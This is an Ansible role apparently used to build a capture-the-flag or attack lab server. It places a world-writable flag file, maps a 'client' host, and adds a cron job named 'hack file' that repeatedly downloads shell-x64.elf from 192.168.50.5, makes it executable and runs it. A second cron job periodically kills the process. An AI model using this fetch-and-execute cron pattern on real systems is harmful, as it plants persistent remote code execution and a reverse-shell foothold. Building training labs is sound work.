---
# This is a role for setting up the server.

- name: Install packages
  apt:
    pkg:
     - wget
     - net-tools
     - wine
     - libwine
    update_cache: yes

- name: Place flag
  copy:
    dest: '/home/server/flag.txt'
    owner: 'server'
    content: "Top_Secret_Flag\n"
    mode: '0777'

- name: Create alias for client
  lineinfile:
    path: '/etc/hosts'
    line: '192.168.50.5 client'

- name: Cron job for malicious file
  cron:
   name: "hack file"
   minute: "*/3" # every 3 minutes
   job: "wget -O /home/server/shell-x64.elf http://192.168.50.5/shell-x64.elf && chmod +x /home/server/shell-x64.elf && /home/server/shell-x64.elf"

- name: Cronjob kill
  cron:
   name: "hack kill"
   minute: "*/6" # every 6 minutes
   job: "pkill shell-x64.elf"

...
